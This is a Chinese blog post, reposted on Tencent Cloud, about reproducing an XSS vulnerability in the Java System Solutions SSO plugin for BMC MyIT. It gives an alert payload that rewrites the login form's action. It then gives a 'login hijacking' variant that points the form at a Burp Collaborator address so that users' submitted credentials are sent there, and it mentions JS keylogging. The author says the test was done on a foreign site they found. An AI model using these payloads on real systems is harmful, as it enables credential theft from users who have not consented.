前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

作者头像
C4rpeDime
发布2018-09-28 11:01:05
6540
发布2018-09-28 11:01:05
举报
文章被收录于专栏:黑白安全
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

  今天看到这个漏洞,找了一个国外的站复现了一下,并且想出了一个新的思路,分享一下。

漏洞复现过程

  漏洞描述是这样说的。

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

  其给出的payload是:/ux/jss-sso/arslogin?javascript:alert(123)。其原理是改变form表单的action属性为javascript:alert(123),如果用户点击登录按钮则会触发XSS。

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

新思路-登录劫持

  那么问题来了,这是一个登录界面的XSS,而XSS导致的结果是泄露用户Cookie,用户还没登陆怎么能拿到用户登录后的Cookie呢?

  • 方法1:用JS记录键盘
  • 方法2:Burp的Collaborator client插件获取用户登录信息

  将Burp的Collaborator client插件生成的地址复制一下。

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

  使用payload:/ux/jss-sso/arslogin?http://DNS隧道地址

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

  点击登录以后,在Burp的Collaborator client插件中查看请求信息

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞
JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

  使用Burp的Collaborator client插件要比直接利用XSS更加方便直接。

添加收藏

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞复现过程
  • 新思路-登录劫持
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档